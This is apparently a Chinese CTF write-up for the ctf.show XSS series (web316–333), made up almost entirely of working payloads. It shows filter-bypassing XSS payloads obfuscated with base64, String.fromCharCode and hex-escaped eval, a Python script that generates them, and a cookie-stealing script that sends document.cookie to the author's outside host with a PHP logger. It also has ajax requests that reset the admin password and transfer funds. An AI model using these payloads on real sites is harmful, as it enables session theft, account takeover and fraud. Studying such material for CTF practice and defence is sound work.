文章目录
- 前言
- web316
- web317-319
- 前面某些题梭哈
- web320
- web321
- web322-324过滤了;
- web325过滤了.
- 前面那个String.fromCharCode生产payload
- web327
- web328
- web329
- web320
- web331
- web322-323
- 参考链接
前言
以下需要师父们自己url解码哦,然后大部分使用了xss平台盲打连接最下方也有,过滤空格用/,师傅们注意这可能不是一篇WP,我之前忘记备份了呜呜,凑合着用一下,相关原理自己琢磨下
web316
http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E
web317-319
http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly95NHRhY2tlci50b3AvaGFjay5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+autofocus%3E
前面某些题梭哈
<input οnfοcus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
web320
http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32,60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,89,84,85,104,62,60,47,115,67,82,105,112,84,62));”
web321
http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/οnlοad=“document.write(String.fromCharCode(32));document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));”
web322-324过滤了;
<body/οnlοad=‘document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));’>
web325过滤了.
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
web326过滤了括号
<body/οnlοad=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>
前面那个String.fromCharCode生产payload
a= "<sCrIpt srC=//xs.sb/YTUh></sCRipT>"
res = ''
res2 = ''
for i in a:
tmp = ord(i)
res += str(tmp)
res+=","
res2 +=f"document.write(String.fromCharCode({str(tmp)}));"
# print(res)
# print(res2)
a = "646f63756d656e742e777269746528537472696e672e66726f6d43686172436f64652836302c3131352c36372c3131342c37332c3131322c3131362c33322c3131352c3131342c36372c36312c34372c34372c3132302c3131352c34362c3131352c39382c34372c38392c38342c38352c3130342c36322c36302c34372c3131352c36372c38322c3130352c3131322c38342c363229293b"
z = 0
res = ''
for i in a:
if z ==2:
z=0
if z ==0:
res+=r"\x"
res += i
z+=1
print(res)
web327
注意收件人是admin,无过滤
web328
自己搭建,主要是偷管理员的cookie
写一个js
var img = new Image();
img.src = "http://y4tacker.top/index.php?q="+document.cookie
document.body.append(img);
下面是index.php
<?php
$cookie = $_GET['q'];
$myFile = "cookie.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>
注册
<script src=你的js地址></script>
之后把这个cookie替换掉浏览器里面本身的,访问用户管理页面就可以了
web329
从这道题以后,群主设置了把cookie发送给你之前就让它失效了,所以换一个思路获取页面元素
自己搭建
var img = new Image();
img.src = “http://y4tacker.top/index.php?q=”+document.querySelector(’#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main’).textContent;
document.body.append(img); <?php $cookie = $_GET['q']; $myFile = "cookie.txt"; file_put_contents($myFile, $cookie, FILE_APPEND); ?>
web320
通过上一道题发现密码是admin*******所以改密码吧
$.ajax({url:“http://127.0.0.1/api/change.php?p=111111”,success:function(result){}});
web331
$.ajax({
url: “http://127.0.0.1/api/change.php”,
method: “POST”,
data:{
‘p’:‘111111’
},
cache: false,
success: function(res){}});
web322-323
一个是get请求,一个是post请求,payload类似web331,主要是向admin那里转账到自己注册的新号,然后去买flag就行了,当然你们可以发现题目其实有个小漏洞,自己向自己转钱钱也还会越来越多
$.ajax({
url: "http://127.0.0.1/api/amount.php",
method: "POST",
data:{
'u':'y4tacker',
'a':10000
},
cache: false,
success: function(res){
}});